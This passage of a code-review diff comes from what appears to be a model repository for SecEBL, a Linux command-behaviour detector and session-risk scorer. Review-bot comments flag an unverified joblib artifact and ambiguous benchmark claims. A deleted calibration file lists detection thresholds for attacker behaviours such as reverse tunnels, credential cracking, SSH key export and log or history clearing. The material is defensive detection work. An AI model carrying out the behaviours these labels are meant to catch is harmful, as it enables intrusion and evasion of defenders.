+ labels. For normal use, prefer the companion GitHub helpers because they keep
431
+ the prompt profile, semantic text loading, top-k output format, and optional L2
432
+ feature path aligned with this release.
 
 
 
 
 
 
 
 
 
 
 
 
 
433
 
434
  ## Intended Use
435
 
 
437
  - Internal security detection, investigation, and triage for systems an
438
  organization owns, operates, administers, or is explicitly authorized to
439
  defend.
440
+ - Building session-level risk scoring over SecEBL behavior-label streams.
441
 
442
  ## Out Of Scope
443
 
 
450
  ## License
451
 
452
  The model artifacts are released under **SecEBL Model License 1.0**. This is an
453
+ open-weight restricted-use model license, not Apache-2.0 and not an
454
+ OSI-approved open source license.
455
 
456
  The base model is `Alibaba-NLP/gte-modernbert-base`, which is Apache-2.0.
457
  Source code, schemas, public examples, and helper scripts in the companion
l2_artifacts/README.md CHANGED
@@ -5,45 +5,47 @@ It is included so the companion GitHub `scripts/run_examples.sh` can run public
5
  Linux example-session scoring by default when this Hugging Face model snapshot
6
  is used as `MODEL_DIR`.
7
 
8
- Run tags:
9
-
10
- ```text
11
- L1: featurize-rev20-20260620-072423-ep128-bs112-latestdata
12
- L2: featurize-rev20-20260620-072423-ep128-bs112-latestdata-l2hn27-lenctx-semcal-20260621
13
- ```
14
-
15
  ## Files
16
 
17
  | Path | Purpose |
18
  | --- | --- |
19
  | `logreg.joblib` | Fitted logistic-regression L2 session-risk model. |
20
- | `tag_risk_policy.rev20.json` | Matching tag-selection and L2 risk-feature policy. |
21
  | `train_summary.json` | Public aggregate training/evaluation summary with no raw rows or real session identifiers. |
22
 
23
  The release does not include the L2 training JSONL, raw pressure-stream archive,
24
- full final sessions, per-session pressure results, alert JSONL, source-code
25
  copies, or private run logs. Use the companion GitHub repository for source
26
  code and public example data.
27
 
28
  ## Scope
29
 
30
- L2 consumes cached L1 outputs and aggregates semantic session features such as
31
- tag ratios, marker diversity, retrieval-score summaries, professional/routine
32
- operation ratios, and compact attack-chain indicators.
 
33
 
34
  Runtime L2 does not use raw command text, user names, host names, or session ids
35
  as scoring features. Session ids may appear in private data-prep workflows for
36
  label assignment, but they are not runtime allow/deny lists.
37
 
 
 
 
 
 
38
  ## Public Summary
39
 
40
  | Check | Result |
41
  | --- | ---: |
42
- | Fitted withheld Linux final-session check | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
43
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
44
  | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
45
 
46
- The high final-session accuracy is scoped to the current fitted internal
47
  experiment. It is evidence that this L2 setup works well on the current complex
48
  internal benchmark and pressure-data fit-check, not an independent claim of
49
  general production IDS accuracy.
 
 
 
 
5
  Linux example-session scoring by default when this Hugging Face model snapshot
6
  is used as `MODEL_DIR`.
7
 
 
 
 
 
 
 
 
8
  ## Files
9
 
10
  | Path | Purpose |
11
  | --- | --- |
12
  | `logreg.joblib` | Fitted logistic-regression L2 session-risk model. |
13
+ | `tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
14
  | `train_summary.json` | Public aggregate training/evaluation summary with no raw rows or real session identifiers. |
15
 
16
  The release does not include the L2 training JSONL, raw pressure-stream archive,
17
+ full internal sessions, per-session pressure results, alert JSONL, source-code
18
  copies, or private run logs. Use the companion GitHub repository for source
19
  code and public example data.
20
 
21
  ## Scope
22
 
23
+ L2 is an experimental session scorer. A session is a sequence of events grouped
24
+ by `session_id`. L1 labels each event independently; L2 scores the whole session
25
+ by aggregating cached L1 ranked tags, retrieval scores, tag diversity, behavior
26
+ transitions, and routine-operation context.
27
 
28
  Runtime L2 does not use raw command text, user names, host names, or session ids
29
  as scoring features. Session ids may appear in private data-prep workflows for
30
  label assignment, but they are not runtime allow/deny lists.
31
 
32
+ For compatibility with the released L2 artifact, L2 derives its session
33
+ features from cached L1 `top_labels` using an internal selected-tag feature
34
+ path. This does not change L1 prediction output: users still receive ranked
35
+ `top_labels`, not a selected `behavior_tags` field.
36
+
37
  ## Public Summary
38
 
39
  | Check | Result |
40
  | --- | ---: |
41
+ | Fitted withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
42
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
43
  | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
44
 
45
+ The high session benchmark accuracy is scoped to the current fitted internal
46
  experiment. It is evidence that this L2 setup works well on the current complex
47
  internal benchmark and pressure-data fit-check, not an independent claim of
48
  general production IDS accuracy.
49
+
50
+ Use the companion GitHub helpers so feature extraction matches the released L2
51
+ artifact.
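Review bot: The Files table ships `logreg.joblib`, and the opening lines say `scripts/run_examples.sh` scores with it by default when this snapshot is `MODEL_DIR`, but nothing in the README tells the user how to verify the file; joblib files are pickle-based, so loading one can execute code from whatever snapshot was fetched. Suggest adding a SHA-256 for `logreg.joblib` and a recommendation to load it only from a pinned revision. Separately, renaming the first summary row to "Fitted withheld Linux session benchmark" makes the 0 FP / 0 FN line read like a held-out result while the paragraph under the table scopes it to the "current fitted internal experiment"; say in the row whether those 663 sessions were used in fitting.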
l2_artifacts/tag_risk_policy.rev20.json CHANGED
@@ -66,11 +66,10 @@
66
  "family": "persistence"
67
  }
68
  },
69
- "global_score_floor": 0.45,
70
  "max_tags_per_command": 4,
71
  "min_tag_score": 0.55,
72
  "multi_label_gap": 0.12,
73
- "notes": "Rev20 flat behavior-tag session risk policy. L1 tag selection uses the single balanced-gap path: top1 must pass calibration, then very close threshold-passing secondary labels within multi_label_gap are retained up to max_tags_per_command. Tag-level points describe intrinsic behavior risk; session-level aggregation combines evidence, diversity, routine maintenance, and professional operations context. scoring_professional_operations is a negative context signal only when professional tags are dominant, anchor evidence is present, explicit attacks are absent, and non-professional hard attack markers are absent. It is not a command or tag whitelist.",
74
  "operational_context_markers": [
75
  "cloud_identity",
76
  "identity_policy",
 
66
  "family": "persistence"
67
  }
68
  },
 
69
  "max_tags_per_command": 4,
70
  "min_tag_score": 0.55,
71
  "multi_label_gap": 0.12,
72
+ "notes": "Rev20 flat behavior-tag session risk policy. L2 derives session features from cached L1 top_labels using an internal tag-selection path that matches the released L2 model artifact. This does not change L1 prediction output: users still receive ranked top_labels, not a selected behavior_tags field. Tag-level points describe intrinsic behavior risk; session-level aggregation combines evidence, diversity, routine maintenance, and professional operations context. scoring_professional_operations is a negative context signal only when professional tags are dominant, anchor evidence is present, explicit attacks are absent, and non-professional hard attack markers are absent. It is not a command or tag whitelist.",
73
  "operational_context_markers": [
74
  "cloud_identity",
75
  "identity_policy",
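Review bot: Removing `"global_score_floor": 0.45` and the notes text that spelled out selection (top1 must pass calibration, close secondaries within `multi_label_gap`, capped at `max_tags_per_command`) leaves `min_tag_score`, `multi_label_gap` and `max_tags_per_command` in the policy with no statement of how they combine, and this commit also deletes `score_calibration.rev20.json`, the only visible source of the per-label thresholds the old notes relied on. The new notes say the internal path matches the released L2 model artifact; please state in `notes` which thresholds that path applies now and where they come from, so a reader can confirm `logreg.joblib` is scored on features selected the same way it was fitted.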
l2_artifacts/train_summary.json CHANGED
@@ -1,7 +1,7 @@
1
  {
2
  "schema": "secebl_rev20_l2_public_summary_v1",
3
- "l1_run": "featurize-rev20-20260620-072423-ep128-bs112-latestdata",
4
- "l2_run": "featurize-rev20-20260620-072423-ep128-bs112-latestdata-l2hn27-lenctx-semcal-20260621",
5
  "model_type": "logistic_regression_session_scorer",
6
  "scoring_scope": "experimental fitted L2 session scorer over cached L1 semantic features",
7
  "runtime_feature_exclusions": [
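Review bot: Dropping `l1_run` and `l2_run` in favour of fixed release strings removes the only fields in this summary that tie the reported metrics to a specific encoder and scorer build. If the internal run tags should not be public, replace them with something a user can verify from the repository, such as the Hugging Face commit revision or a SHA-256 of the released files, rather than a free-text label.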
@@ -30,7 +30,7 @@
30
  "fp": 15,
31
  "tn": 5306
32
  },
33
- "withheld_final_session_fit_check": {
34
  "sessions": 663,
35
  "rows_seen": 12594,
36
  "attack_sessions": 365,
 
1
  {
2
  "schema": "secebl_rev20_l2_public_summary_v1",
3
+ "l1_release": "SecEBL-Rev20 public L1 release",
4
+ "l2_release": "SecEBL-Rev20 public L2 artifact",
5
  "model_type": "logistic_regression_session_scorer",
6
  "scoring_scope": "experimental fitted L2 session scorer over cached L1 semantic features",
7
  "runtime_feature_exclusions": [
 
30
  "fp": 15,
31
  "tn": 5306
32
  },
33
+ "withheld_session_benchmark_fit_check": {
34
  "sessions": 663,
35
  "rows_seen": 12594,
36
  "attack_sessions": 365,
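Review bot: `withheld_final_session_fit_check` becomes `withheld_session_benchmark_fit_check` while `schema` stays `secebl_rev20_l2_public_summary_v1`, so anything that reads the summary by key breaks with no version signal (the `l1_run` and `l2_run` renames at the top of the file have the same effect). Either bump the schema id or keep the old key names.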
schema/tags_schema_rev20.json CHANGED
@@ -4,13 +4,13 @@
4
  "vocabulary_revision": 20,
5
  "status": "draft_pending_manual_reverse_review",
6
  "purpose": "Objective single-command Linux behavior recognition using one flat vocabulary of complete detection-relevant behaviors.",
7
- "model_output": {
8
  "behavior_tags": [
9
  "zero or more visible complete behavior labels"
10
  ]
11
  },
12
  "invariants": [
13
- "The model emits one flat behavior_tags array; groups exist only for vocabulary maintenance.",
14
  "Each label describes a complete visible behavior rather than a fragment that downstream code must recombine.",
15
  "Labels may combine an operation with a stable target, scope, direction, or execution form when that combination materially changes detection meaning.",
16
  "Emit the most-specific applicable behavior and suppress its generic parent behavior.",
 
4
  "vocabulary_revision": 20,
5
  "status": "draft_pending_manual_reverse_review",
6
  "purpose": "Objective single-command Linux behavior recognition using one flat vocabulary of complete detection-relevant behaviors.",
7
+ "label_row_schema": {
8
  "behavior_tags": [
9
  "zero or more visible complete behavior labels"
10
  ]
11
  },
12
  "invariants": [
13
+ "Training and evaluation label rows use one flat behavior_tags array; prediction output exposes ranked top_labels.",
14
  "Each label describes a complete visible behavior rather than a fragment that downstream code must recombine.",
15
  "Labels may combine an operation with a stable target, scope, direction, or execution form when that combination materially changes detection meaning.",
16
  "Emit the most-specific applicable behavior and suppress its generic parent behavior.",
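Review bot: The rewritten first invariant says prediction output exposes ranked `top_labels`, but the lines shown still define only `behavior_tags` under `label_row_schema`, and the invariants that follow are still phrased as emission rules ("Emit the most-specific applicable behavior and suppress its generic parent behavior"). Please add the shape of `top_labels` next to `label_row_schema` and say whether parent suppression applies to the ranked output or only to label rows; a consumer building detections on `top_labels` needs to know whether a specific label and its generic parent can both appear.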
score_calibration.rev20.json DELETED
@@ -1,1891 +0,0 @@
1
- {
2
- "axis_thresholds": {
3
- "cloud_control_plane": {
4
- "threshold": 0.6849,
5
- "tp_p50": 0.7858,
6
- "tp_samples": 3877
7
- },
8
- "configuration_and_log_modification": {
9
- "threshold": 0.5729,
10
- "tp_p50": 0.7522,
11
- "tp_samples": 3377
12
- },
13
- "containers_and_cloud_native": {
14
- "threshold": 0.6272,
15
- "tp_p50": 0.7672,
16
- "tp_samples": 7405
17
- },
18
- "database_and_infrastructure_services": {
19
- "threshold": 0.6013,
20
- "tp_p50": 0.7376,
21
- "tp_samples": 10039
22
- },
23
- "execution_and_process": {
24
- "threshold": 0.5419,
25
- "tp_p50": 0.6715,
26
- "tp_samples": 8078
27
- },
28
- "filesystem_and_data": {
29
- "threshold": 0.4651,
30
- "tp_p50": 0.5904,
31
- "tp_samples": 15305
32
- },
33
- "identity_auth_and_secrets": {
34
- "threshold": 0.6071,
35
- "tp_p50": 0.7482,
36
- "tp_samples": 5560
37
- },
38
- "kernel_memory_and_tracing": {
39
- "threshold": 0.6668,
40
- "tp_p50": 0.7787,
41
- "tp_samples": 1768
42
- },
43
- "network": {
44
- "threshold": 0.541,
45
- "tp_p50": 0.6974,
46
- "tp_samples": 20337
47
- },
48
- "observation_and_discovery": {
49
- "threshold": 0.5103,
50
- "tp_p50": 0.6811,
51
- "tp_samples": 29944
52
- },
53
- "package_build_and_source": {
54
- "threshold": 0.6235,
55
- "tp_p50": 0.7606,
56
- "tp_samples": 5751
57
- },
58
- "persistence_services_and_storage": {
59
- "threshold": 0.6133,
60
- "tp_p50": 0.7706,
61
- "tp_samples": 5651
62
- }
63
- },
64
- "counts": {
65
- "eval_rows": 82895,
66
- "labels_with_threshold": 361,
67
- "semantic_labels": 361,
68
- "sparse_labels": 0,
69
- "tp_observations": 117092
70
- },
71
- "default_threshold": 0.531,
72
- "global_floor": 0.45,
73
- "label_thresholds": {
74
- "append_system_log": {
75
- "threshold": 0.5597,
76
- "tp_p50": 0.7486,
77
- "tp_samples": 609
78
- },
79
- "apply_infrastructure_template": {
80
- "threshold": 0.6683,
81
- "tp_p50": 0.7477,
82
- "tp_samples": 139
83
- },
84
- "archive_sensitive_content": {
85
- "threshold": 0.5092,
86
- "tp_p50": 0.5666,
87
- "tp_samples": 592
88
- },
89
- "attach_multiplexer_session": {
90
- "threshold": 0.7399,
91
- "tp_p50": 0.8292,
92
- "tp_samples": 102
93
- },
94
- "attach_process_debugger": {
95
- "threshold": 0.6326,
96
- "tp_p50": 0.71,
97
- "tp_samples": 248
98
- },
99
- "attempt_remote_authentication": {
100
- "threshold": 0.5069,
101
- "tp_p50": 0.5863,
102
- "tp_samples": 631
103
- },
104
- "authenticate_cloud_cli": {
105
- "threshold": 0.6809,
106
- "tp_p50": 0.7282,
107
- "tp_samples": 123
108
- },
109
- "build_container_image": {
110
- "threshold": 0.639,
111
- "tp_p50": 0.7632,
112
- "tp_samples": 261
113
- },
114
- "build_source_code": {
115
- "threshold": 0.5956,
116
- "tp_p50": 0.7638,
117
- "tp_samples": 980
118
- },
119
- "capture_network_flows": {
120
- "threshold": 0.7264,
121
- "tp_p50": 0.7795,
122
- "tp_samples": 113
123
- },
124
- "capture_network_packets": {
125
- "threshold": 0.6213,
126
- "tp_p50": 0.8106,
127
- "tp_samples": 283
128
- },
129
- "capture_process_memory": {
130
- "threshold": 0.7009,
131
- "tp_p50": 0.802,
132
- "tp_samples": 146
133
- },
134
- "capture_process_state": {
135
- "threshold": 0.6364,
136
- "tp_p50": 0.7099,
137
- "tp_samples": 227
138
- },
139
- "change_file_ownership": {
140
- "threshold": 0.6687,
141
- "tp_p50": 0.8016,
142
- "tp_samples": 184
143
- },
144
- "change_password": {
145
- "threshold": 0.6503,
146
- "tp_p50": 0.7162,
147
- "tp_samples": 134
148
- },
149
- "clear_login_history": {
150
- "threshold": 0.692,
151
- "tp_p50": 0.7781,
152
- "tp_samples": 106
153
- },
154
- "clear_shell_history": {
155
- "threshold": 0.6478,
156
- "tp_p50": 0.7663,
157
- "tp_samples": 132
158
- },
159
- "clone_source_repository": {
160
- "threshold": 0.6837,
161
- "tp_p50": 0.8069,
162
- "tp_samples": 130
163
- },
164
- "compress_data": {
165
- "threshold": 0.5834,
166
- "tp_p50": 0.6926,
167
- "tp_samples": 430
168
- },
169
- "configure_cloud_cli": {
170
- "threshold": 0.657,
171
- "tp_p50": 0.7533,
172
- "tp_samples": 127
173
- },
174
- "connect_cloud_database": {
175
- "threshold": 0.7249,
176
- "tp_p50": 0.8119,
177
- "tp_samples": 109
178
- },
179
- "connect_external_service": {
180
- "threshold": 0.5224,
181
- "tp_p50": 0.6528,
182
- "tp_samples": 400
183
- },
184
- "connect_internal_service": {
185
- "threshold": 0.5129,
186
- "tp_p50": 0.6238,
187
- "tp_samples": 868
188
- },
189
- "connect_local_service": {
190
- "threshold": 0.5749,
191
- "tp_p50": 0.6629,
192
- "tp_samples": 173
193
- },
194
- "connect_mail_server": {
195
- "threshold": 0.6892,
196
- "tp_p50": 0.7791,
197
- "tp_samples": 124
198
- },
199
- "consume_message": {
200
- "threshold": 0.6451,
201
- "tp_p50": 0.7776,
202
- "tp_samples": 164
203
- },
204
- "crack_credential_material": {
205
- "threshold": 0.6732,
206
- "tp_p50": 0.7608,
207
- "tp_samples": 113
208
- },
209
- "create_access_token": {
210
- "threshold": 0.5892,
211
- "tp_p50": 0.6797,
212
- "tp_samples": 203
213
- },
214
- "create_archive": {
215
- "threshold": 0.4903,
216
- "tp_p50": 0.5582,
217
- "tp_samples": 1240
218
- },
219
- "create_cloud_access_key": {
220
- "threshold": 0.6997,
221
- "tp_p50": 0.8081,
222
- "tp_samples": 143
223
- },
224
- "create_cloud_compute": {
225
- "threshold": 0.76,
226
- "tp_p50": 0.8079,
227
- "tp_samples": 109
228
- },
229
- "create_cloud_identity": {
230
- "threshold": 0.6934,
231
- "tp_p50": 0.8043,
232
- "tp_samples": 125
233
- },
234
- "create_cloud_resource": {
235
- "threshold": 0.6841,
236
- "tp_p50": 0.7385,
237
- "tp_samples": 102
238
- },
239
- "create_cluster_identity": {
240
- "threshold": 0.7239,
241
- "tp_p50": 0.7737,
242
- "tp_samples": 119
243
- },
244
- "create_cluster_secret": {
245
- "threshold": 0.6945,
246
- "tp_p50": 0.8116,
247
- "tp_samples": 140
248
- },
249
- "create_container_pod": {
250
- "threshold": 0.5728,
251
- "tp_p50": 0.6787,
252
- "tp_samples": 238
253
- },
254
- "create_credential_material": {
255
- "threshold": 0.5511,
256
- "tp_p50": 0.6301,
257
- "tp_samples": 504
258
- },
259
- "create_database": {
260
- "threshold": 0.7242,
261
- "tp_p50": 0.8347,
262
- "tp_samples": 116
263
- },
264
- "create_dynamic_proxy": {
265
- "threshold": 0.6547,
266
- "tp_p50": 0.8056,
267
- "tp_samples": 130
268
- },
269
- "create_forward_tunnel": {
270
- "threshold": 0.6512,
271
- "tp_p50": 0.7743,
272
- "tp_samples": 213
273
- },
274
- "create_local_kubernetes_cluster": {
275
- "threshold": 0.7144,
276
- "tp_p50": 0.7761,
277
- "tp_samples": 127
278
- },
279
- "create_multiplexer_session": {
280
- "threshold": 0.6507,
281
- "tp_p50": 0.7863,
282
- "tp_samples": 115
283
- },
284
- "create_privileged_container": {
285
- "threshold": 0.5842,
286
- "tp_p50": 0.6388,
287
- "tp_samples": 136
288
- },
289
- "create_reverse_tunnel": {
290
- "threshold": 0.6474,
291
- "tp_p50": 0.7795,
292
- "tp_samples": 195
293
- },
294
- "create_scheduled_task": {
295
- "threshold": 0.6437,
296
- "tp_p50": 0.7858,
297
- "tp_samples": 435
298
- },
299
- "create_special_filesystem_node": {
300
- "threshold": 0.6502,
301
- "tp_p50": 0.7319,
302
- "tp_samples": 127
303
- },
304
- "create_ssh_key": {
305
- "threshold": 0.6914,
306
- "tp_p50": 0.7923,
307
- "tp_samples": 125
308
- },
309
- "create_startup_script": {
310
- "threshold": 0.6812,
311
- "tp_p50": 0.7888,
312
- "tp_samples": 108
313
- },
314
- "create_systemd_unit": {
315
- "threshold": 0.6508,
316
- "tp_p50": 0.8192,
317
- "tp_samples": 242
318
- },
319
- "create_user": {
320
- "threshold": 0.6809,
321
- "tp_p50": 0.8211,
322
- "tp_samples": 167
323
- },
324
- "decode_data": {
325
- "threshold": 0.5974,
326
- "tp_p50": 0.6861,
327
- "tp_samples": 194
328
- },
329
- "decrease_file_permission": {
330
- "threshold": 0.6328,
331
- "tp_p50": 0.8114,
332
- "tp_samples": 134
333
- },
334
- "decrypt_data": {
335
- "threshold": 0.6147,
336
- "tp_p50": 0.7404,
337
- "tp_samples": 142
338
- },
339
- "delete_audit_log": {
340
- "threshold": 0.6353,
341
- "tp_p50": 0.7633,
342
- "tp_samples": 179
343
- },
344
- "delete_business_log": {
345
- "threshold": 0.73,
346
- "tp_p50": 0.8098,
347
- "tp_samples": 132
348
- },
349
- "delete_cloud_identity": {
350
- "threshold": 0.7894,
351
- "tp_p50": 0.8372,
352
- "tp_samples": 103
353
- },
354
- "delete_cloud_resource": {
355
- "threshold": 0.7485,
356
- "tp_p50": 0.794,
357
- "tp_samples": 104
358
- },
359
- "delete_cluster_secret": {
360
- "threshold": 0.789,
361
- "tp_p50": 0.8464,
362
- "tp_samples": 133
363
- },
364
- "delete_container": {
365
- "threshold": 0.6874,
366
- "tp_p50": 0.8464,
367
- "tp_samples": 117
368
- },
369
- "delete_container_image": {
370
- "threshold": 0.7256,
371
- "tp_p50": 0.7917,
372
- "tp_samples": 110
373
- },
374
- "delete_credential_material": {
375
- "threshold": 0.6564,
376
- "tp_p50": 0.7905,
377
- "tp_samples": 349
378
- },
379
- "delete_database": {
380
- "threshold": 0.6837,
381
- "tp_p50": 0.7965,
382
- "tp_samples": 118
383
- },
384
- "delete_database_data": {
385
- "threshold": 0.6273,
386
- "tp_p50": 0.7763,
387
- "tp_samples": 140
388
- },
389
- "delete_infrastructure_log": {
390
- "threshold": 0.6904,
391
- "tp_p50": 0.8135,
392
- "tp_samples": 219
393
- },
394
- "delete_local_kubernetes_cluster": {
395
- "threshold": 0.7161,
396
- "tp_p50": 0.815,
397
- "tp_samples": 114
398
- },
399
- "delete_object_storage": {
400
- "threshold": 0.7169,
401
- "tp_p50": 0.8125,
402
- "tp_samples": 134
403
- },
404
- "delete_scheduled_task": {
405
- "threshold": 0.7464,
406
- "tp_p50": 0.8187,
407
- "tp_samples": 147
408
- },
409
- "delete_secret_store": {
410
- "threshold": 0.7269,
411
- "tp_p50": 0.7851,
412
- "tp_samples": 108
413
- },
414
- "delete_source_code": {
415
- "threshold": 0.691,
416
- "tp_p50": 0.7612,
417
- "tp_samples": 113
418
- },
419
- "delete_system_log": {
420
- "threshold": 0.6467,
421
- "tp_p50": 0.8135,
422
- "tp_samples": 245
423
- },
424
- "delete_systemd_unit": {
425
- "threshold": 0.7714,
426
- "tp_p50": 0.8278,
427
- "tp_samples": 107
428
- },
429
- "delete_user": {
430
- "threshold": 0.7637,
431
- "tp_p50": 0.8657,
432
- "tp_samples": 109
433
- },
434
- "deploy_cloud_template": {
435
- "threshold": 0.7584,
436
- "tp_p50": 0.7903,
437
- "tp_samples": 108
438
- },
439
- "destroy_infrastructure_template": {
440
- "threshold": 0.7483,
441
- "tp_p50": 0.8196,
442
- "tp_samples": 119
443
- },
444
- "disable_service": {
445
- "threshold": 0.6817,
446
- "tp_p50": 0.8133,
447
- "tp_samples": 130
448
- },
449
- "download_executable": {
450
- "threshold": 0.5748,
451
- "tp_p50": 0.6657,
452
- "tp_samples": 213
453
- },
454
- "download_external_content": {
455
- "threshold": 0.4931,
456
- "tp_p50": 0.6022,
457
- "tp_samples": 711
458
- },
459
- "download_internal_content": {
460
- "threshold": 0.5448,
461
- "tp_p50": 0.6474,
462
- "tp_samples": 431
463
- },
464
- "download_local_content": {
465
- "threshold": 0.6659,
466
- "tp_p50": 0.7478,
467
- "tp_samples": 104
468
- },
469
- "download_named_content": {
470
- "threshold": 0.5718,
471
- "tp_p50": 0.6736,
472
- "tp_samples": 162
473
- },
474
- "download_object_storage": {
475
- "threshold": 0.6075,
476
- "tp_p50": 0.6665,
477
- "tp_samples": 218
478
- },
479
- "download_script": {
480
- "threshold": 0.5612,
481
- "tp_p50": 0.6822,
482
- "tp_samples": 363
483
- },
484
- "enable_service": {
485
- "threshold": 0.6228,
486
- "tp_p50": 0.8019,
487
- "tp_samples": 268
488
- },
489
- "encode_data": {
490
- "threshold": 0.6378,
491
- "tp_p50": 0.7107,
492
- "tp_samples": 118
493
- },
494
- "encrypt_data": {
495
- "threshold": 0.5854,
496
- "tp_p50": 0.6496,
497
- "tp_samples": 173
498
- },
499
- "enumerate_cloud_accounts": {
500
- "threshold": 0.7469,
501
- "tp_p50": 0.8039,
502
- "tp_samples": 132
503
- },
504
- "enumerate_cloud_identity": {
505
- "threshold": 0.7273,
506
- "tp_p50": 0.8196,
507
- "tp_samples": 160
508
- },
509
- "enumerate_cloud_resources": {
510
- "threshold": 0.6883,
511
- "tp_p50": 0.7806,
512
- "tp_samples": 172
513
- },
514
- "enumerate_cloud_secrets": {
515
- "threshold": 0.7336,
516
- "tp_p50": 0.8529,
517
- "tp_samples": 120
518
- },
519
- "enumerate_cluster_resources": {
520
- "threshold": 0.6408,
521
- "tp_p50": 0.7959,
522
- "tp_samples": 528
523
- },
524
- "enumerate_cluster_secrets": {
525
- "threshold": 0.6719,
526
- "tp_p50": 0.8149,
527
- "tp_samples": 166
528
- },
529
- "enumerate_container_images": {
530
- "threshold": 0.6911,
531
- "tp_p50": 0.7858,
532
- "tp_samples": 117
533
- },
534
- "enumerate_containers": {
535
- "threshold": 0.6307,
536
- "tp_p50": 0.8009,
537
- "tp_samples": 183
538
- },
539
- "enumerate_database_schema": {
540
- "threshold": 0.6795,
541
- "tp_p50": 0.7982,
542
- "tp_samples": 450
543
- },
544
- "enumerate_filesystem": {
545
- "threshold": 0.5685,
546
- "tp_p50": 0.7079,
547
- "tp_samples": 1303
548
- },
549
- "enumerate_kernel_modules": {
550
- "threshold": 0.7595,
551
- "tp_p50": 0.825,
552
- "tp_samples": 110
553
- },
554
- "enumerate_listeners": {
555
- "threshold": 0.6619,
556
- "tp_p50": 0.7691,
557
- "tp_samples": 193
558
- },
559
- "enumerate_logged_in_users": {
560
- "threshold": 0.7132,
561
- "tp_p50": 0.7871,
562
- "tp_samples": 110
563
- },
564
- "enumerate_network_connections": {
565
- "threshold": 0.6908,
566
- "tp_p50": 0.7941,
567
- "tp_samples": 263
568
- },
569
- "enumerate_object_storage": {
570
- "threshold": 0.7243,
571
- "tp_p50": 0.8205,
572
- "tp_samples": 290
573
- },
574
- "enumerate_open_files": {
575
- "threshold": 0.6981,
576
- "tp_p50": 0.7901,
577
- "tp_samples": 160
578
- },
579
- "enumerate_packages": {
580
- "threshold": 0.6189,
581
- "tp_p50": 0.783,
582
- "tp_samples": 677
583
- },
584
- "enumerate_processes": {
585
- "threshold": 0.5937,
586
- "tp_p50": 0.776,
587
- "tp_samples": 979
588
- },
589
- "enumerate_scheduled_tasks": {
590
- "threshold": 0.7378,
591
- "tp_p50": 0.8023,
592
- "tp_samples": 152
593
- },
594
- "enumerate_services": {
595
- "threshold": 0.7177,
596
- "tp_p50": 0.8071,
597
- "tp_samples": 100
598
- },
599
- "enumerate_users": {
600
- "threshold": 0.6327,
601
- "tp_p50": 0.7307,
602
- "tp_samples": 123
603
- },
604
- "enumerate_workloads": {
605
- "threshold": 0.6822,
606
- "tp_p50": 0.7614,
607
- "tp_samples": 66
608
- },
609
- "execute_cloud_compute": {
610
- "threshold": 0.6317,
611
- "tp_p50": 0.6851,
612
- "tp_samples": 133
613
- },
614
- "execute_detached_process": {
615
- "threshold": 0.5426,
616
- "tp_p50": 0.6384,
617
- "tp_samples": 464
618
- },
619
- "execute_downloaded_content": {
620
- "threshold": 0.5087,
621
- "tp_p50": 0.6003,
622
- "tp_samples": 422
623
- },
624
- "execute_encoded_command": {
625
- "threshold": 0.6755,
626
- "tp_p50": 0.7586,
627
- "tp_samples": 110
628
- },
629
- "execute_from_temporary_path": {
630
- "threshold": 0.5086,
631
- "tp_p50": 0.6274,
632
- "tp_samples": 927
633
- },
634
- "execute_from_user_writable_path": {
635
- "threshold": 0.5868,
636
- "tp_p50": 0.6874,
637
- "tp_samples": 140
638
- },
639
- "execute_in_chroot": {
640
- "threshold": 0.5636,
641
- "tp_p50": 0.6283,
642
- "tp_samples": 206
643
- },
644
- "execute_in_container": {
645
- "threshold": 0.5318,
646
- "tp_p50": 0.6008,
647
- "tp_samples": 437
648
- },
649
- "execute_in_workload": {
650
- "threshold": 0.5627,
651
- "tp_p50": 0.6586,
652
- "tp_samples": 363
653
- },
654
- "execute_package_hook": {
655
- "threshold": 0.6658,
656
- "tp_p50": 0.7576,
657
- "tp_samples": 125
658
- },
659
- "execute_remote_command": {
660
- "threshold": 0.4979,
661
- "tp_p50": 0.5971,
662
- "tp_samples": 1374
663
- },
664
- "execute_scheduled_task": {
665
- "threshold": 0.6857,
666
- "tp_p50": 0.7771,
667
- "tp_samples": 125
668
- },
669
- "execute_via_dynamic_loader": {
670
- "threshold": 0.6875,
671
- "tp_p50": 0.7607,
672
- "tp_samples": 126
673
- },
674
- "execute_with_changed_identity": {
675
- "threshold": 0.5693,
676
- "tp_p50": 0.6263,
677
- "tp_samples": 187
678
- },
679
- "export_cluster_config": {
680
- "threshold": 0.6523,
681
- "tp_p50": 0.7264,
682
- "tp_samples": 123
683
- },
684
- "export_cluster_resources": {
685
- "threshold": 0.6604,
686
- "tp_p50": 0.7899,
687
- "tp_samples": 113
688
- },
689
- "export_database_dump": {
690
- "threshold": 0.588,
691
- "tp_p50": 0.7732,
692
- "tp_samples": 856
693
- },
694
- "export_ssh_key": {
695
- "threshold": 0.6655,
696
- "tp_p50": 0.7379,
697
- "tp_samples": 117
698
- },
699
- "extract_archive": {
700
- "threshold": 0.5768,
701
- "tp_p50": 0.6592,
702
- "tp_samples": 223
703
- },
704
- "fetch_remote_certificate": {
705
- "threshold": 0.6344,
706
- "tp_p50": 0.6968,
707
- "tp_samples": 178
708
- },
709
- "fetch_remote_mail": {
710
- "threshold": 0.7509,
711
- "tp_p50": 0.7796,
712
- "tp_samples": 110
713
- },
714
- "flush_cache_data": {
715
- "threshold": 0.6307,
716
- "tp_p50": 0.7261,
717
- "tp_samples": 129
718
- },
719
- "format_filesystem": {
720
- "threshold": 0.7579,
721
- "tp_p50": 0.8166,
722
- "tp_samples": 153
723
- },
724
- "generate_artifact_digest": {
725
- "threshold": 0.6133,
726
- "tp_p50": 0.7441,
727
- "tp_samples": 506
728
- },
729
- "grant_cloud_privilege": {
730
- "threshold": 0.6825,
731
- "tp_p50": 0.7921,
732
- "tp_samples": 165
733
- },
734
- "grant_cluster_privilege": {
735
- "threshold": 0.7027,
736
- "tp_p50": 0.8091,
737
- "tp_samples": 162
738
- },
739
- "grant_database_privilege": {
740
- "threshold": 0.7207,
741
- "tp_p50": 0.8461,
742
- "tp_samples": 133
743
- },
744
- "grant_infrastructure_privilege": {
745
- "threshold": 0.6554,
746
- "tp_p50": 0.73,
747
